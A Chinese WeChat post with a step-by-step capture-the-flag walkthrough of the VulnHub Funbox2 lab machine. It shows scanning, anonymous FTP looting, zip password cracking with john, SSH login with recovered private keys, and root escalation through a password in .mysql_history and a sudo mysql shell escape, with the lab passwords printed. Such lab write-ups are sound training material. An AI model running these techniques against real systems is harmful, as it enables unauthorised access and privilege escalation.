声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/funbox/Funbox2.ova
内容简介:
主机发现
端口扫描
信息收集
FTP服务漏洞
密码爆破
SSH公钥认证
rbash逃逸
本地提权
1.1 主机发现
arp-scan -l
1.2 端口扫描
nmap -p- 192.168.144.222
1.3 信息搜集
nmap -p21,22,80 -A 192.168.144.222Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-01 22:46 EDTNmap scan report for 192.168.144.222Host is up (0.00098s latency).PORT STATE SERVICE VERSION21/tcp open ftp ProFTPD 1.3.5e| ftp-anon: Anonymous FTP login allowed (FTP code 230)| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip| -r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip| -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg|_-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)| 256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)|_ 256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))|_http-title: Apache2 Ubuntu Default Page: It works| http-robots.txt: 1 disallowed entry|_/logs/|_http-server-header: Apache/2.4.29 (Ubuntu)MAC Address: 08:00:27:BE:BE:5F (Oracle VirtualBox virtual NIC)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 4.X|5.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5OS details: Linux 4.15 - 5.6Network Distance: 1 hopService Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT ADDRESS1 0.98 ms 192.168.144.222OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 15.95 seconds
开启了ftp的匿名访问,程序版本ProFTPD 1.3.5e
1.4 深度信息搜集(ftp)
ftp 192.168.144.222 // 账号 anonymous 密码 空ls -lamget * //下载所有文件get . //下载隐藏文件get . //下载隐藏文件
cat . //发现 base64编码echo -n "SGkgQWRtaW5zLAoKYmUgY2FyZWZ1bGwgd2l0aCB5b3VyIGtleXMuIEZpbmQgdGhlbSBpbiAleW91cm5hbWUlLnppcC4KVGhlIHBhc3N3b3JkcyBhcmUgdGhlIG9sZCBvbmVzLgoKUmVnYXJkcwpyb290" | base64 -d//通过 base64 解码
在这些压缩包里面有可能存在管理员的key
1.5 暴力破解
解压压缩包,需要暴力破解密码
cp /usr/share/wordlists/rockyou.txt.gz .gunzip rockyou.txt.gzzip2john cathrine.zip > cathrine.hash //转换一下 实现john爆破john --wordlist=rockyou.txt cathrine.hashzip2john tom.zip > tom.hashjohn --wordlist=rockyou.txt tom.hash
|
压缩包 |
解压密码 |
|
cathrine.zip |
catwoman |
|
tom.zip |
iubire |
把他们分别解压缩发现id_rsa
1.6 SSH公钥认证
mkdir cathrineunzip cathrine.zipmv id_rsa cathrinemkdir tomunzip tom.zipmv id_rsa tomcd tom //尝试登录chmod 400 id_rsassh [email protected] -i id_rsa //登陆成功!
1.7 权限提升
cat .mysql_history查看到了如下_HiStOrY_V2_show040databases;quitcreate040database040'support';create040database040support;use040supportcreate040table040users;show040tables;select040*040from040support;show040tables;select040*040from040support;insert040into040support040(tom,040xx11yy22!);quit
从中发现了好像是账号tom,密码xx11yy22!
sudo -s
存在rbash逃逸
sudo -l 查看可以执行所有命令,利用mysql服务进行权限提升
ps -ef | grep mysqlsudo -lsudo mysql -u tom -p //密码为 xx11yy22!! bash
okokok
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
原文始发于微信公众号(嗨嗨安全):靶机实战系列之Funbox2靶机
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论